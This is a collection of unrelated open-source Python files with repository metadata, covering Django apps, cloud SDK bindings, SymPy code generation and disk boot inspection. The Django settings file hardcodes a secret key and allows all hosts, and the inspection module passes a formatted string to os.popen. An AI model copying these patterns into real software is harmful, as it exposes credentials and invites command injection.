except Exception as err:
logger.debug(err)
raise
# dynamically select connection uri class
UriClass = db_uris.get(db_adapter)
return UriClass().build_conn_uri(db_conf)
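# Illustrative usage sketch (file name, adapter and schema below are examples only):
#
#     uri = conn_uri_factory('dbconf.yml', 'postgresql', 'warehouse')
#     session = DbConnection(uri).start_session()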
# db inspector
| 29.220994 | 91 | 0.673284 |
4a1f534f96b10e15980d6e7db7bf87318539cd6b | 748 | py | Python | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 4 | 2022-03-08T09:05:13.000Z | 2022-03-16T17:59:43.000Z | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 64 | 2022-03-08T01:11:40.000Z | 2022-03-31T17:23:49.000Z | spid_cie_oidc/entity/migrations/0013_alter_federationentityconfiguration_metadata.py | peppelinux/spid-cie-oidc-authority | 816636fece10f410f5d6fce85fd79bb409d0c8b8 | [
"Apache-2.0"
] | 8 | 2022-03-09T12:00:08.000Z | 2022-03-31T13:52:14.000Z | # Generated by Django 4.0.2 on 2022-03-13 00:41
from django.db import migrations, models
import spid_cie_oidc.entity.validators
class Migration(migrations.Migration):
dependencies = [
('spid_cie_oidc_entity', '0012_delete_publicjwk'),
]
operations = [
migrations.AlterField(
model_name='federationentityconfiguration',
name='metadata',
field=models.JSONField(default=dict, help_text='federation_entity metadata, eg: {"federation_entity": { ... },"openid_provider": { ... },"openid_relying_party": { ... },"oauth_resource": { ... }}', validators=[spid_cie_oidc.entity.validators.validate_entity_metadata, spid_cie_oidc.entity.validators.validate_metadata_algs]),
),
]
| 37.4 | 337 | 0.691176 |
4a1f54728b6dcf3d211418f777de5ccfe734f29d | 605 | py | Python | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 126 | 2019-10-30T00:58:02.000Z | 2022-01-26T06:29:10.000Z | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 14 | 2019-11-05T15:10:22.000Z | 2022-02-08T09:05:53.000Z | models/backbone/__init__.py | shiyutang/CAG_UDA | c3eda799e2edbd2dd0b6ab6bd8b12727167c9c91 | [
"MIT"
] | 26 | 2019-12-02T09:41:11.000Z | 2022-01-29T10:46:41.000Z | from models.backbone import resnet, xception, drn, mobilenet
def build_backbone(backbone, output_stride, BatchNorm):
if backbone == 'resnet101':
return resnet.ResNet101(output_stride, BatchNorm)
elif backbone == 'resnet50':
return resnet.ResNet50(output_stride, BatchNorm)
elif backbone == 'xception':
return xception.AlignedXception(output_stride, BatchNorm)
elif backbone == 'drn':
return drn.drn_d_54(BatchNorm)
elif backbone == 'mobilenet':
return mobilenet.MobileNetV2(output_stride, BatchNorm)
else:
raise NotImplementedError
| 37.8125 | 65 | 0.710744 |
4a1f54d0c77258b6365a847d7323882a8f25a8a5 | 560 | py | Python | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 73 | 2015-01-03T15:09:26.000Z | 2022-03-30T23:52:55.000Z | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 958 | 2015-01-02T08:27:45.000Z | 2022-03-23T14:51:51.000Z | planemo/commands/cmd_profile_list.py | gmauro/planemo | 574088f356a7b9f49191daf15437c2973c7318d8 | [
"CC-BY-3.0"
] | 84 | 2015-01-06T18:27:28.000Z | 2021-11-18T01:58:17.000Z | """Module describing the planemo ``profile_list`` command."""
from __future__ import print_function
import click
from planemo.cli import command_function
from planemo.galaxy import profiles
from planemo.io import info
@click.command('profile_list')
@command_function
def cli(ctx, **kwds):
"""List configured profile names."""
info("Looking for profiles...")
profile_names = profiles.list_profiles(ctx, **kwds)
for profile in profile_names:
print(profile)
info("{} configured profiles are available.".format(len(profile_names)))
| 28 | 76 | 0.741071 |
4a1f551e0b3c0ca2cf54b07c3a71b3d713327da7 | 5,175 | py | Python | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/recoveryservices/v20200202/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
Private Endpoint Connection Response Properties
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.PrivateEndpointConnectionResponse':
"""
PrivateEndpointConnectionResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_private_endpoint_connection(private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
Private Endpoint Connection Response Properties
:param str private_endpoint_connection_name: The name of the private endpoint connection.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20200202:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
| 34.966216 | 174 | 0.644831 |
4a1f5661c5688b7b0d9e4bc5f271f4d305d3ed43 | 2,081 | py | Python | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | null | null | null | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | null | null | null | blog/views.py | JochenFM/art_prints_ms4 | 61fd8a06aa398ac97ce32ac9627d3ece113af85f | [
"PostgreSQL"
] | 1 | 2021-09-02T09:48:19.000Z | 2021-09-02T09:48:19.000Z | from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.models import User
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
DeleteView
)
from .models import Post
# Create your views here.
def blog(request):
context = {
'posts': Post.objects.all()
}
return render(request, 'blog/blog.html', context)
class PostListView(ListView):
model = Post
template_name = 'blog/blog.html' # name convention is <app>/<model>_<viewtype>.html
context_object_name = 'posts'
ordering = ['-date_posted']
paginate_by = 4
# to filter and display posts created by a certain user
class UserPostListView(ListView):
model = Post
template_name = 'blog/user_posts.html'
context_object_name = 'posts'
paginate_by = 2
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return Post.objects.filter(author=user).order_by('-date_posted')
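# Illustrative URL wiring for the view above (the real route lives in the
# project's urls.py and may differ):
#
#     path('user/<str:username>/', UserPostListView.as_view(), name='user-posts')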
class PostDetailView(DetailView):
model = Post
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
fields = ['title', 'content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ['title', 'content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
"""test function to check whether current logged in user = author of post"""
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
success_url = '/blog/'
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
| 25.072289 | 88 | 0.677559 |
4a1f5751fbd4d6b44d99c69a74ad89a8496f8648 | 1,792 | py | Python | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 8,323 | 2015-01-02T15:51:43.000Z | 2022-03-31T13:13:19.000Z | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 15,102 | 2015-01-01T01:33:17.000Z | 2022-03-31T22:53:13.000Z | sympy/codegen/futils.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 4,490 | 2015-01-01T17:48:07.000Z | 2022-03-31T17:24:05.000Z | from itertools import chain
from sympy.codegen.fnodes import Module
from sympy.core.symbol import Dummy
from sympy.printing.fortran import FCodePrinter
""" This module collects utilities for rendering Fortran code. """
def render_as_module(definitions, name, declarations=(), printer_settings=None):
""" Creates a ``Module`` instance and renders it as a string.
This generates Fortran source code for a module with the correct ``use`` statements.
Parameters
==========
definitions : iterable
Passed to :class:`sympy.codegen.fnodes.Module`.
name : str
Passed to :class:`sympy.codegen.fnodes.Module`.
declarations : iterable
Passed to :class:`sympy.codegen.fnodes.Module`. It will be extended with
use statements, 'implicit none' and public list generated from ``definitions``.
printer_settings : dict
Passed to ``FCodePrinter`` (default: ``{'standard': 2003, 'source_format': 'free'}``).
"""
printer_settings = printer_settings or {'standard': 2003, 'source_format': 'free'}
printer = FCodePrinter(printer_settings)
dummy = Dummy()
if isinstance(definitions, Module):
raise ValueError("This function expects to construct a module on its own.")
mod = Module(name, chain(declarations, [dummy]), definitions)
fstr = printer.doprint(mod)
module_use_str = ' %s\n' % ' \n'.join(['use %s, only: %s' % (k, ', '.join(v)) for
k, v in printer.module_uses.items()])
module_use_str += ' implicit none\n'
module_use_str += ' private\n'
module_use_str += ' public %s\n' % ', '.join([str(node.name) for node in definitions if getattr(node, 'name', None)])
return fstr.replace(printer.doprint(dummy), module_use_str)
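# Illustrative sketch (assumes ``fort_routine`` is an existing sympy.codegen
# AST node, e.g. a FunctionDefinition built elsewhere):
#
#     src = render_as_module([fort_routine], 'demo_mod')
#     # ``src`` is Fortran source containing the generated use statements,
#     # 'implicit none' and a public list for the named definitions.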
| 43.707317 | 123 | 0.662946 |
4a1f578dda292e6f1e9a5dfa6289089a5e76466e | 6,902 | py | Python | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | 1 | 2020-06-04T20:31:26.000Z | 2020-06-04T20:31:26.000Z | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | 1 | 2021-08-18T19:00:35.000Z | 2021-08-18T19:00:35.000Z | daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py | a-zakem/compute-image-tools | 28138fd8e1a6c245125b744a7d912720d7239b2c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Finds boot-related properties of disks.
This module supports offline inspection of block devices and
virtual disk files, with a focus on information that typically
requires booting the system.
See `model.InspectionResults` for which information is returned.
In terms of OS support, this module focuses on systems
that are runnable on Google Compute Engine, with a particular focus on the
systems that are importable to Google Compute Engine:
https://cloud.google.com/compute/docs/import
In other words, it doesn't seek to exhaustively detect all systems,
and will remove support for defunct systems over time.
"""
import os
import re
import sys
from boot_inspect.inspectors.os import architecture, linux, windows
import boot_inspect.system.filesystems
from compute_image_tools_proto import inspect_pb2
_LINUX = [
linux.Fingerprint(inspect_pb2.Distro.AMAZON,
aliases=['amzn', 'amazonlinux']),
linux.Fingerprint(
inspect_pb2.Distro.CENTOS,
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/centos-release'},
disallow={'/etc/fedora-release',
'/etc/oracle-release'}),
version_reader=linux.VersionReader(
metadata_file='/etc/centos-release',
version_pattern=re.compile(r'\d+\.\d+')),
),
linux.Fingerprint(
inspect_pb2.Distro.DEBIAN,
version_reader=linux.VersionReader(
metadata_file='/etc/debian_version',
version_pattern=re.compile(r'\d+\.\d+'),
),
),
linux.Fingerprint(inspect_pb2.Distro.FEDORA),
linux.Fingerprint(inspect_pb2.Distro.KALI),
linux.Fingerprint(
inspect_pb2.Distro.RHEL,
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/redhat-release'},
disallow={'/etc/fedora-release',
'/etc/oracle-release',
'/etc/centos-release'}),
version_reader=linux.VersionReader(
metadata_file='/etc/redhat-release',
version_pattern=re.compile(r'\d+\.\d+')),
),
# Depending on the version, SLES for SAP has a variety of identifiers in
# /etc/os-release. To match, one of those identifiers must be seen
# *and* the file /etc/products.d/SLES_SAP.prod must exist.
#
# This is documented here:
# https://www.suse.com/support/kb/doc/?id=000019341
linux.Fingerprint(
inspect_pb2.Distro.SLES_SAP,
aliases=['sles', 'sles_sap'],
fs_predicate=linux.FileExistenceMatcher(
require={'/etc/products.d/SLES_SAP.prod'})
),
linux.Fingerprint(inspect_pb2.Distro.SLES),
linux.Fingerprint(inspect_pb2.Distro.OPENSUSE, aliases=['opensuse-leap']),
linux.Fingerprint(inspect_pb2.Distro.ORACLE,
aliases=['ol', 'oraclelinux']),
linux.Fingerprint(inspect_pb2.Distro.UBUNTU),
]
def inspect_device(g) -> inspect_pb2.InspectionResults:
"""Finds boot-related properties for a device using offline inspection.
Args:
g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.
Example:
g = guestfs.GuestFS(python_return_dict=True)
g.add_drive_opts("/dev/sdb", format="raw")
g.launch()
        results = inspect_device(g)
"""
roots = g.inspect_os()
if len(roots) == 0:
return inspect_pb2.InspectionResults(
os_count=len(roots)
)
root = roots[0]
mount_points = g.inspect_get_mountpoints(root)
for dev, mp in sorted(mount_points.items(), key=lambda k: len(k[0])):
try:
g.mount_ro(mp, dev)
except RuntimeError as msg:
print('%s (ignored)' % msg, file=sys.stderr)
fs = boot_inspect.system.filesystems.GuestFSFilesystem(g)
operating_system = linux.Inspector(fs, _LINUX).inspect()
if not operating_system:
operating_system = windows.Inspector(g, root).inspect()
if operating_system:
operating_system.architecture = architecture.Inspector(g, root).inspect()
g.umount_all()
return inspect_pb2.InspectionResults(
os_release=operating_system,
os_count=1 if operating_system else 0,
)
def inspect_boot_loader(g, device) -> inspect_pb2.InspectionResults:
"""Finds boot-loader properties for the device using offline inspection.
Args:
g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.
device: a reference to a mounted block device (eg: /dev/sdb), or
to a virtual disk file (eg: /opt/images/disk.vmdk).
Example:
g = guestfs.GuestFS(python_return_dict=True)
g.add_drive_opts("/dev/sdb", format="raw")
g.launch()
        results = inspect_boot_loader(g, "/dev/sdb")
"""
bios_bootable = False
uefi_bootable = False
root_fs = ""
try:
stream = os.popen('gdisk -l {}'.format(device))
output = stream.read()
print(output)
if _inspect_for_hybrid_mbr(output):
bios_bootable = True
part_list = g.part_list('/dev/sda')
for part in part_list:
try:
guid = g.part_get_gpt_type('/dev/sda', part['part_num'])
# It covers both GPT "EFI System" and BIOS "EFI (FAT-12/16/32)".
if guid == 'C12A7328-F81F-11D2-BA4B-00A0C93EC93B':
uefi_bootable = True
# TODO: detect root_fs (b/169245755)
# It covers "BIOS boot", which make a protective-MBR bios-bootable.
if guid == '21686148-6449-6E6F-744E-656564454649':
bios_bootable = True
except Exception:
continue
except Exception as e:
print("Failed to inspect disk partition: ", e)
return inspect_pb2.InspectionResults(
bios_bootable=bios_bootable,
uefi_bootable=uefi_bootable,
root_fs=root_fs,
)
def _inspect_for_hybrid_mbr(gdisk_output) -> bool:
    """Finds hybrid MBR, which potentially is BIOS bootable even without a BIOS
    boot partition.
Args:
gdisk_output: output from gdisk that contains partition info.
"""
is_hybrid_mbr = False
mbr_bios_bootable_re = re.compile(r'(.*)MBR:[\s]*hybrid(.*)', re.DOTALL)
if mbr_bios_bootable_re.match(gdisk_output):
is_hybrid_mbr = True
return is_hybrid_mbr
def _linux_inspector(
fs: boot_inspect.system.filesystems.Filesystem) -> linux.Inspector:
"""Returns a linux.Inspector that is configured
with all detectable Linux distros.
"""
return linux.Inspector(fs, _LINUX)
| 33.342995 | 78 | 0.687627 |
4a1f57db4929e392386256739d393287c1d608fd | 339 | py | Python | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 147 | 2016-02-24T16:37:03.000Z | 2022-02-18T12:10:34.000Z | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 269 | 2016-02-25T14:04:14.000Z | 2022-03-26T07:30:53.000Z | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 89 | 2016-03-16T18:21:56.000Z | 2022-02-03T14:34:30.000Z | import clr
rooms = IN[0]
doors = IN[1]
fromroom = IN[2]
toroom = IN[3]
elementlist = list()
i = 0
while i < (len(rooms)-1):
j = 0
while j < len(doors):
if (rooms[i] == fromroom[j] and rooms[i+1] == toroom[j]) or (rooms[i+1] == fromroom[j] and rooms[i] == toroom[j]):
elementlist.append(doors[j])
j += 1
i += 1
OUT = elementlist | 19.941176 | 116 | 0.59587 |
4a1f5a23a977994e6019bb7f5ebbd7dff7a1e4da | 2,048 | py | Python | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | null | null | null | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | 27 | 2021-05-10T09:52:18.000Z | 2022-03-28T15:10:56.000Z | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "browser-history"
copyright = "2020, Samyak Sarnayak"
author = "Samyak Sarnayak"
# The full version, including alpha/beta/rc tags
release = "0.3.1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
"sphinxarg.ext",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
| 33.57377 | 79 | 0.665527 |
4a1f5a6a58568754cf5ce8eb196568f21b29acc3 | 3,783 | py | Python | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | """
Django settings for djangoecommerce project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-uhpfb-=5&l!s0h5sn8*(3a^slvqng24z7b$0yt!a8w+2*$m9#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['appdjangoecommercee.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'catalog',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoecommerce.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
# apps
'catalog.context_processors.categories',
],
},
},
]
WSGI_APPLICATION = 'djangoecommerce.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Recife'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
ALLOWED_HOSTS = ['*']
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
try:
from .local_settings import *
except ImportError:
pass | 27.215827 | 91 | 0.706846 |
4a1f5a7a8d3c5c086af3980e035ec9048052d3fa | 586 | py | Python | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | 13 | 2016-05-13T05:59:55.000Z | 2022-01-07T00:05:57.000Z | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | null | null | null | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | 4 | 2016-11-01T06:22:56.000Z | 2020-02-09T17:45:48.000Z | # -*- coding: utf-8 -*-
"""
board connection - provide classes to connect to some robotic board like arduino or raspberry py
directly via bluetooth or over TCP/IP
"""
from glue.protocols import protocols
from glue.systems import systems
def connect(data):
"""
connect to system using protocol
:param data: data that describes system and protocol
"""
protocol_data = data['protocol']
protocol = protocols[protocol_data['name']](protocol_data)
system_data = data['system']
system = systems[system_data['name']](protocol, system_data)
return system | 26.636364 | 96 | 0.713311 |
4a1f5a9246076d38e2117c7da17d6009350304ed | 31 | py | Python | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermoModelingAlpha | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | 4 | 2017-09-24T21:30:46.000Z | 2019-06-01T13:37:44.000Z | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermo-state-solver | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | 19 | 2020-01-28T21:41:50.000Z | 2022-03-11T23:17:39.000Z | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermo-state-solver | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | null | null | null | /usr/lib64/python3.5/keyword.py | 31 | 31 | 0.806452 |
4a1f5bb8cfd7f227ca1a6938ea727fac348b970d | 388 | py | Python | instance/models.py | devopsconsulting/webvirtmgr | cc35978cae4a1a53b93056df946896ae992fe176 | [
"Apache-2.0"
] | 1 | 2019-07-16T20:32:44.000Z | 2019-07-16T20:32:44.000Z | instance/models.py | normaldotcom/webvirtmgr | 8d822cb94105abf82eb0ff6651a36c43b0911d2a | [
"Apache-2.0"
] | null | null | null | instance/models.py | normaldotcom/webvirtmgr | 8d822cb94105abf82eb0ff6651a36c43b0911d2a | [
"Apache-2.0"
] | null | null | null | from django.db import models
from servers.models import Compute
class Instance(models.Model):
compute = models.ForeignKey(Compute)
name = models.CharField(max_length=20)
uuid = models.CharField(max_length=36)
# display_name = models.CharField(max_length=50)
# display_description = models.CharField(max_length=255)
def __unicode__(self):
return self.name
| 27.714286 | 59 | 0.742268 |
4a1f5bbc5a9ce98718c82f8f783b65f3e5e2860d | 1,395 | py | Python | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
